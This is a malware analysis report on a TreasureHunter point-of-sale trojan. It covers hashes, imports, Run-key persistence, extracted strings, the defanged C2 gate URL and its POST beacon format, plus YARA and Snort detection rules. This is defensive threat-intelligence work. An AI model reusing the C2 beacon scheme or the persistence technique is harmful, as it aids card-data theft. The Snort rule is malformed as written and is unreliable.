Treasure Hunter: Weird PoS Variant

[*] MD5           : 2dfddbc240cd6e320f69b172c1e3ce58
[*] SHA-1        : e573a6fd61fd3928201d85dbffe5aefe21e49192
[*] SHA-256    : e70614382ad300bd8c1f2cedb3259212057c40433e22ffeee7292ae576c4eae2
 
[+] File Type: EXE
[+] Address of entry point      : 0x00005a82
[+] Image Base Address                     : 0x00400000
[+] Packer / Compiler: MS Visual C++ 8.0

------------------------------------------------------------
Executable         \Windows\explorer.exe
Executable         \jucheck.exe
Web Page           logmeinrescue[.]us[.]com/system/oauth/gate[.]php
Library            ADVAPI32.dll
Library            KERNEL32.dll
Library            SHELL32.dll
Library            USER32.dll
Library            USERENV.dll
Library            WINHTTP.dll
Database           C:\work\treasureHunter\Release\treasureHunter

[+] Sections
            Name: .text     Virtual Address: 0x00001000 Size: 0x0000fcda         Entropy: 6.667572
            Name: .rdata  Virtual Address: 0x00011000 Size: 0x00005eb2        Entropy: 4.641277
            Name: .data    Virtual Address: 0x00017000 Size: 0x00002fe0        Entropy: 3.331543
            Name: .rsrc     Virtual Address: 0x0001a000 Size: 0x000001e0        Entropy: 4.710061
            Name: .reloc   Virtual Address: 0x0001b000 Size: 0x000012a4        Entropy: 6.678696

Size                 : 100864 bytes
Type                : PE32 executable (GUI) Intel 80386, for MS Windows
Architecture    : 32 Bits binary
MD5                : 2dfddbc240cd6e320f69b172c1e3ce58
SHA1               : e573a6fd61fd3928201d85dbffe5aefe21e49192
ssdeep             : 1536:d5cgmB+WGCa+A7ARq9DuqVcaFsWjcdtr2DlYItl:77piUA3qTqtKDlYS
imphash                      : 1172c7987d01e157969e819ad80d2fd1
Date                : 0x56066F7F [Sat Sep 26 10:12:15 2015 UTC]
Language        : ENGLISH
CRC:     (Claimed) : 0x0, (Actual): 0x253dd [SUSPICIOUS]
Entry Point      : 0x405a82 .text 0/5
================
Offset | Instructions
----------------------------------------
0          call 0x408ef3
5          jmp 0x405a8c
10        push byte 0x14
12        push dword 0x4161f0
17        call 0x4094a0
22        call 0x4090da
27        movzx esi,ax
30        push byte 0x2
32        call 0x408ea6
37        pop ecx
38        mov eax,0x5a4d
43        cmp [0x400000],ax
50        jz 0x405aba
52        xor ebx,ebx
54        jmp 0x405aed
56        mov eax,[0x40003c]
61        cmp dword [eax+0x400000],0x4550
71        jnz 0x405ab6
73        mov ecx,0x10b
78        cmp [eax+0x400018],cx
85        jnz 0x405ab6
87        xor ebx,ebx
89        cmp dword [eax+0x400074],0xe
96        jna 0x405aed
98        cmp [eax+0x5be80000],ebx

Suspicious:

• The file modifies the registry.
• The file contains 120 blacklisted strings.
• The symbol (WinHttpReceiveResponse) is imported several (9) times.
• The file opts for Address Space Layout Randomization (ASLR).
• The file opts for cookies on the stack (GS).
• The file has no Version.
• The file does not contain a digital certificate.
• The file checksum (0x00000000) is invalid.
• The debug file name (treasurehunter.pdb) is different than the file name (crime_win_treasurehunt_pos).

Imports:
[1] KERNEL32.dll
[2] USER32.dll
[3] ADVAPI32.dll
[4] SHELL32.dll
[5] USERENV.dll
[6] WINHTTP.dll

Suspicious IAT:
[1] CopyFileA
[2] CreateDirectoryA
[3] CreateFileW
[4] CreateProcessA
[5] CreateThread
[6] CreateToolhelp32Snapshot
[7] DeleteFileA
[8] DeviceIoControl
[9] GetCommandLineA
[10] GetFileSize
[11] GetModuleFileNameA
[12] GetModuleFileNameW
[13] GetModuleHandleExW
[14] GetModuleHandleW
[15] GetProcAddress
[16] GetStartupInfoW
[17] IsDebuggerPresent
[18] LoadLibraryExW
[19] OpenProcess
[20] OpenProcessToken
[21] OutputDebugStringW
[22] Process32FirstW
[23] Process32NextW
[24] ReadProcessMemory
[25] RegCloseKey
[26] RegOpenKeyExW
[27] Sleep
[28] TerminateProcess
[29] UnhandledExceptionFilter
[30] WriteFile

​Anti Debug discovered [7]
------------------------------------------------------------
Function           GetLastError
Function           IsDebuggerPresent
Function           OutputDebugStringW
Function           Process32FirstW
Function           Process32NextW
Function           TerminateProcess
Function           UnhandledExceptionFilter

offset   num  description [bits.endian.size]
  --------------------------------------------
  000151e0 2415 Misty md5const [32.le.256]
  00015db2 2545 anti-debug: IsDebuggerPresent [..17]
  000172e8 2053 RIPEMD-128 InitState [32.le.16&]

Dynamic Analysis
 
Processes:
PID       ParentPID        User    Path    
--------------------------------------------------
4256    3220    USER-06EF21E8DC:Administrator      C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe  
 
Monitored RegKeys
Registry Key    Value  
--------------------------------------------------
HKLM\Software\Microsoft\Windows\CurrentVersion\Run  jucheck=C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe

API Logger:
404ce2     CreateMutex(41ab9249dbb6472366a18be70e72cc72)   
4048ce     WaitForSingleObject(768,0)         
77f66aed     WaitForSingleObject(764,0)     
404a27     Copy(C:\Documents and Settings\Administrator\Desktop\treasure.exe->C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe) 
7c8283dc     WriteFile(h=75c)           
404824     RegSetValueExA (jucheck)
404b99     CreateProcessA(C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe,C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe 2fb216b58f88bebe8bec6e851f40904b373a574aa4d279d0a109a32efd84d3475b82b1e4fb1a37ac2250d1c1af226a677552901f268fa61bba0e4971,0,C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72)

File: jucheck.exe [no packer]
Size: 100864 Bytes
MD5: 2DFDDBC240CD6E320F69B172C1E3CE58

RegKeys
--------------------------------------------------
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
ExeRefs
--------------------------------------------------
File: jucheck_dmp.exe_
\Windows\explorer.exe
\jucheck.exe
C:\Documents and Settings\Administrator\Application Data\41ab9249dbb6472366a18be70e72cc72\jucheck.exe
Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again
 
Raw Strings:
--------------------------------------------------
File: jucheck_dmp.exe_
MD5:  4d3d7df594a0d379b073f8effca772c5
Size: 118786

Interesting Strings:
?report=true&v2=true
?request=true
\Windows\explorer.exe
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
success
GETKEYS
jucheck
\jucheck.exe
cmdLineDecrypted
C:\work\treasureHunter\Release\treasureHunter.pdb
\ntuser.ini
Cannot open store place
Select to gateway 2
Debug Message
POST
\\.\PhysicalDrive0
ssuccessfully sent the dumps!
SSeDebugPrivilege
Couldn't get a snapshot of the memory processes!
couldn't get a snapshot of the memory processes!
Clingfish mode activated!
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Error opening registry key for autostart in HKLM - not enough rights, trying to open in HKCU
Unknown error opening registry key for autostart
Error creating registry key for autostart
Successfully created registry key for autostart
Already running from the desired location
Successfully created the directory
Successfully copied the file
Failed to copy the file
Failed to create the directory, entering re-install (update) mode
Successfully deleted destination file
Failed to delete the destination file
Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again
An unknown error occured!
Cannot find %AppData%!
Failed to execute the file
Successfully executed the file
TreasureHunter version 0.1.1 Alpha, created by Jolly Roger (jollyroger@prv[.]name) for BearsInc. Greets to Xylitol and co.
Failed to delete original file, retrying
Successfully deleted original file
Couldn't get debug privileges
Successfully reached the gate
Failed to reach the gate

POST Request:
POST /system/oauth/gate[.]php?request=true HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Host: logmeinrescue[.]us[.]com
Content-Length: 79
Connection: Keep-Alive
 
request=[number]&use=[number]&id=[number]
 

/* Global Rule -------------------------------------------------------------- */
/* Will be evaluated first, speeds up scanning process, remove at will */
 
global private rule gen_characteristics {
    condition:
        ( uint16(0) == 0x5a4d or uint16(0) == 0x0000 ) and filesize < 295KB
}
 
/* Rule Set ----------------------------------------------------------------- */
 
rule crime_win_treasurehunter_pos {
    meta:
        description = "Detects a TreasureHunter PoS variant"
        author = "Vitali Kremez"
        date = "2016-07-08"
        hash = "e70614382ad300bd8c1f2cedb3259212057c40433e22ffeee7292ae576c4eae2"

    strings:
        $s0 = "Error - Treasure Hunter is already running on this computer! To re-install, close the jucheck.exe process and try again" fullword wide
        $s1 = "logmeinrescue.us.com/system/oauth/gate.php" fullword ascii
        $s2 = "C:\\work\\treasureHunter\\Release\\treasureHunter.pdb" fullword ascii
        $s3 = "Couldn't get a snapshot of the memory processes!" fullword wide
        $s4 = "couldn't get a snapshot of the memory processes!" fullword wide
        $s5 = "Error opening registry key for autostart in HKLM - not enough rights, trying to open in HKCU" fullword wide
        $s6 = "TreasureHunter version 0.1.1 Alpha, created by Jolly Roger (jollyroger@prv.name) for BearsInc. Greets to Xylitol and co." fullword wide
        $s7 = "Couldn't get debug privileges" fullword wide
        $s8 = "\\Windows\\explorer.exe" fullword ascii
        $s9 = "Failed to execute the file" fullword wide
        $s10 = "ssuccessfully sent the dumps!" fullword wide
        $s11 = "\\jucheck.exe" fullword ascii
        $s12 = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072" ascii
        $s13 = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; ." ascii
        $s14 = "Unknown error opening registry key for autostart" fullword wide
        $s15 = "Successfully executed the file" fullword wide
        $s16 = "Error creating registry key for autostart" fullword wide
        $s17 = "Failed to create the directory, entering re-install (update) mode" fullword wide
        $s18 = "GETKEYS" fullword ascii
        $s19 = ":0:8:F:K:\\:k:|:" fullword ascii
        $s20 = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000" fullword ascii
    condition:
          uint16(0) == 0x5a4d and filesize < 295KB and all of them


alert any $HOME_NET any -> any any (msg:" TreasureHunter POS Alert”; content: “logmeinrescue.us.com”; “/system/oauth/gate.php”;; “pcre: “/.*(request=|\&use=|\&id=).*/”;  classtype: Trojan-activity)